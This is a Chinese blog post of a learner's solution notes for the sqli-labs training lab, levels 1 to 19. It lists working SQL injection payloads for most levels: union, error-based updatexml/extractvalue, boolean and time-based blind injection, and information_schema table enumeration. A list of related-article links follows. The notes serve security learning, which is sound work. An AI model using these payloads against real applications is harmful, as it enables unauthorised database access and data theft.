sqli解题思路

最新推荐文章于 2022-09-16 23:30:25 发布
最新推荐文章于 2022-09-16 23:30:25 发布
阅读量468 收藏
点赞数
分类专栏: 学习 文章标签: sql注入 sqli 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40661620/article/details/97813223
版权

**

sqli-labs解题思路

**

小白开始重新学习sqli

  • 1关:

单引号,字符串,错误注入,联合注入
http://172.16.13.33/sqli/Less-1/?id=1’ and 1=1–+
接着进行联合注入

  • 2关:

整型,报错,联合注入
http://172.16.13.33/sqli/Less-2/?id=1 and 1=2 整型可以不用加注释
后进行联合注入

  • 3关


错误,单引号+括号,字符
http://172.16.13.33/sqli/Less-3/?id=1’) and 1=1–+
后进行联合查询套路

  • 4关


错误,双引号+括号,字符
http://172.16.13.33/sqli/Less-4/?id=1") and 1=1 --+
http://172.16.13.33/sqli/Less-4/?id=-1") union select 1,2,3–+
进行联合注入套路

  • 5关:

二次注入,单引号,字符,报错注入
http://172.16.13.33/sqli/Less-5/?id=1’ and updatexml(1,concat(0x7e,database(),0x7e),1) --+
因为除了错误没有其他回显所以可以用报错注入

  • 6关:

字符,双引号,二次注入
http://172.16.13.33/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1) --+
后用报错注入

  • 7关:

字符,文件

  • 8关:

单引号,布尔盲注
http://172.16.13.33/sqli/Less-8/?id=1’ and length(database())>7–+
http://172.16.13.33/sqli/Less-8/?id=1’ and substr(database(),1,1)=‘s’–+
进行布尔盲注

  • 9关:

单引号,时间盲注
http://172.16.13.33/sqli/Less-9/?id=1’ and if(substr(database(),1,1)=‘s’,sleep(4),1) --+
加burpsuite进行盲注

  • 10关:

双引号,时间盲注
http://172.16.13.33/sqli/Less-10/?id=1" and if(substr(database(),1,1)=‘s’,sleep(4),1) --+

  • 11关:

错误,字符,单引号
admin’ and 1=1#
admin’ order by 5 #
后面用套路进行联合注入

  • 12关:

错误,双引号+括号,字符
1" and 1=1 and 1"
前闭合,中间查询,后面报错,应该是这样没错了,实际测试没问题,可以回显,接下来就再concat()中构造查询语句:用错误查询
admin" and updatexml(1,concat(0x7e,database(),0x7e),1) and"
admin" and updatexml(1,concat(0x7e,length(database()),0x7e),1) and"

  • 13关:

二次注入,单引号,字符
admin’) and 1=1–+
admin’) and updatexml(1,concat(0x7e,database(),0x7e),1)#
admin’) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)#
后面用经典错误注入

  • 14关:

二次注入,单引号,字符
admin" and 1=1#
admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#
admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)# #
后面用错误注入

1’ order by 6#
报错注入:1" and updatexml(1,concat(0x7e,database(),0x7e),1) #
时间盲注:
判断条件:1’ or sleep(5)#如果为时间盲注则延迟
admin’and if(substr(database(),1,1)=‘s’,sleep(5),1)#
admin’and if((substr((select database()),1,1)=‘s’),sleep(5),1)#

  • 15关:

盲注
admin’ and substr(database(),1,1)=‘s’#
用布尔盲注

  • 16关:

双引号+括号,时间/布尔盲注
admin") and 1=1#
admin") and length(database())>9#

  • 17关:

字符,错误注入,单引号
报错型注入,单引号,注释符可用
admin’) and 1=1#
admin" and 1=1#
admin’ and extractvalue(1,concat(0x7e,database(),0x7e),1)#
admin’ and updatexml(1,concat(0x7e,database(),0x7e),1)–+

最终版:
name输入:admin
password输入:admin’ and updatexml(1,concat(0x7e,database(),0x7e),1)#
且注释一定用#

  • 18关:

头部注入,错误
http头注入,当在User-Agent后面加上\时就会报错,是单引号闭合情况????、

  • 19关:

头注入,错误,文件
还没做完,后面慢慢补。

小赵小赵请多关照
关注
专栏目录
SQL 解题思维
Robin_Pi的博客
03-09 1348
SQL 解题思路
数据分析面试题:一道SQL题的7种解法
胖里的博客
12-26 594
嗨,大家好,我是胖里。 今天讨论一道面试中常见的SQL题。 题目是群里小伙伴贡献的,巧是巧的,我之前秋招的时候也遇到了类似的题目,只是换了场景嵌套,这种题目换汤不换药,换件衣服还能提出N个问题,一起来看看吧! 有这么一张表,表中有两列数据,一列是用户id,一列是订单金额,一个用户可能存在多个订单,也就对应了多个订单金额。 找出所以订单金额都大于20元的用户id。 先来提下不同的解题思路: 1.找出订单小于20的id 再left join 2.聚合得到每个用户的订单数,和大于20的订单数,比一比 3.用窗口函
我的 SQLI 解题
qq_46320532的博客
06-09 200
我的 SQLI 解题过程 Less-1 从目录中可以看出这是GET方式提交的 打开题目看到如下界面 打开hackbar 在hackbar中进行sql注入可以避免在url栏中注入代码进行url编码 0、猜猜后台查询语句 输入?id=1试一试 试一试?id=1’ 报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syn
sql新的解题思维
BEIDOUJS的专栏
08-08 840
请用一个sql语句得出结果! 请注意两种解题方法,第一种思维很新,第二种方法的思维和行转列相似
超经典的20道SQL题目(附加解题思路
小叶
03-27 3728
最近学了SQL的内容,老师也给我们发了练习题,感觉在做题的过程中得到了提高,所以将题目和我自己的答案分享一下,希望对大家有所帮助。我使用的是SQL Server 2014 Management Studio。 ---学生表 create table student( sno varchar(10) primary key, --学号 sname varchar(20), --姓名 sage numeric(2),
Sqlilabs解题思路Less-24
Mr.Huang_的博客
10-22 321
目录Less-24 - Second Oder Injections *Real treat* - Stored Injections(二次注入) Less-24 - Second Oder Injections Real treat - Stored Injections(二次注入) 我们的步骤是 1.注册一个admin'#的账号。 2.login.php中是一个检查用户名是否成功登陆的页面,但是其中的sql语句有点问题: $sql = "SELECT * FROM users WHERE userna
sqli-labs Less-5解题思路
qq_35266419的博客
05-12 685
从本节开始就学习盲注,思路较 Less1-4略有不同,请仔细体会 Less-5 Get-Double injection-Single Quotes - String (1)查看页面源代码 通过页面源代码,什么都不显示 (2)猜测数据库的长度 当数据库长度正确和错误时,如上图所示 (3)现在开始猜测数据库第一位(其实盲注和前面几个的解题思路一样,只是手法稍有不同) (4)猜测数据库名称第二...
搭建学习环境(一)——Sqlilabs安装以及解题思路
Mr.Huang_的博客
09-20 258
sqliabs 环境搭建学习地址: https://baynk.blog.csdn.net/article/details/87699078
sqli-labs解题记录
AleisurE的博客
04-03 454
sqli-labs解题记录 参考:sql注入天书 sqli-labs解题大法 说明:这是刚学web渗透的小白,这份解题记录,是在我浅薄的知识基础上进行解题的,其中记录了我解题遇到的问题,想法与步骤。 但是如果您是来学习sql注入的,网上有很多优秀详细的题解,比如上面两篇参考,您一定会学到更多 less1 前几关都比较简单,常规注就行了。 ?id=1 有回显 ?id=1=2 有回显 说明是字符型注入 ?id=’ or 1=1 --+ 闭合单引号 有回显 此时的sql语句是:SELECT * F
sqli-labs-master 过关 1-10 (附解题思路及各注入方法解析)
weixin_47306547的博客
08-22 3635
第 1 关
sqli-labs(1-30) 个人思路分享——SQL注入
CC__Faker的博客
06-20 1269
下载地址:https://github.com/Audi-1/sqli-labs 目录Page-1(Basic Challenges)less-1less-2less-3less-4less-5less-6less-7Page-2 (Advanced Injections)Page-3 (Stacked Injections)Page-4 (Challenges) Page-1(Basic Challenges) less-1 0x01 利用cc'key--+引起语句报错,发现报错中cc正常执行,于是猜测是
WebGoat SQL盲注 解题思路
Abracadabra的专栏
09-20 4711
WebGoat SQL盲注 解题思路 ★ 题目:SQL Injection (advanced) 地址: http://127.0.0.1:8080/WebGoat/start.mvc#lesson/SqlInjectionAdvanced.lesson/4 题目要求最终以Tom的身份登录到系统中。 LOGIN界面: REGISTER界面: ★ 什么是SQL盲注? 这是我自己的理解,不一定准确...
sqli-labs解题大法29 ~40
weixin_43733035的博客
01-24 801
Less-29: 这个…这一关吧,我是没看出来有什么,可能只是单纯的想让我们了解一下waf。 这一关order by 排序,可以;联合查询,可以。参考Less-1。 Background-6 服务器(两层)架构:http://www.cnblogs.com/lcamry/p/5762961.html Less-30: 与Less-29一样,双引号闭合"。 Less-31: 双引号加括号闭合
SQL 分数排名 :最简单的解题思路
celine11111的博客
06-08 1085
这道题很经典,解题思路是写给新手看的,对于高手可能挺简单的,但是对于初学者可能理解起来还是有一定的难度,如果您经查使用SQL,可以跳过了。 SQL题目: 编写一个 SQL 查询来实现分数排名。如果两个分数相同,则两个分数排名(Rank)相同。请注意,平分后的下一个名次应该是下一个连续的整数值。换句话说,名次之间不应该有“间隔”。 根据上述给定的 Scores 表,你的查询应该返回如下,新增一列Rank,且按分数从高到低排列: 解题思路: 新增加一列rank排名,我们先写出基本语法:Select score
mysql解题思路_SQL面试必会50题之解题思路
weixin_42298081的博客
01-19 337
看完SQL视频后作为最终检验,需要自己来编写查询语句。在找了很多习题之后,最终选择了这套网上流传最广泛的题目来作为练习。下面题目所使用到的表在文末,直接复制代码在MySQL里面运行即可生成。这里我们直接进入问题以及解答思路。有用到这套题练习的朋友可以自己复制到MySQL里面做一题后和答案函数对比看答案是否一致,由于解答思路不止一个,建议大家先自己做,后和答案对比,选择更加简洁易懂的答案。这样才能更...
第一届SQL大赛第一期优秀解题思路汇总
03-17 169
SQL大赛第一期解题方法的公布,让我领略了各种新颖巧妙的解题方法。精神也为之一振,就决定写篇总结,把大家好的方法记下来。第一期题目大意如下:给定一个...
【Leetcode】SQL各题思路汇总
weixin_43905298的博客
01-15 566
【Easy】合并两张表格 LEFT JOIN…ON… ⚠️是否需要留下哪张表格的完整信息 【Easy】第二高的工资(与数据顺序大小有关) 首先找出最高的工资 筛选出比最高工资低的工资,取其中最高者 【Medium】第N高的工资 N是不确定的,所以创建一个函数,将N作为参数传入 1.关联嵌套查询:比该行工资高的unique工资数(count)恰好为N-1个 2.LIMIT:对工资做倒序排序,用LIMIT选择第N-1行后的第一个工资(LIMIT 1, 1 OR LIMIT 1 OFFSET N-1) 【难度未知
sqli-lab 题解
weixin_33827731的博客
04-26 274
sqli-lab:1--后边必须跟空格,而且空格必须是url编码的,不然在url中是不识别的。eg:--%20 ,#的空格是%23order by 去发现列数union select 去显示要的数据,当order by不起作用的时候,当order by 不在末尾的时候。也可以用来判断列。如:mysql> SELECT * FROM users WHERE id =3 ...
牛客网SQL167解题思路
liutao3233的博客
09-16 177
SQL查询语句进阶
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值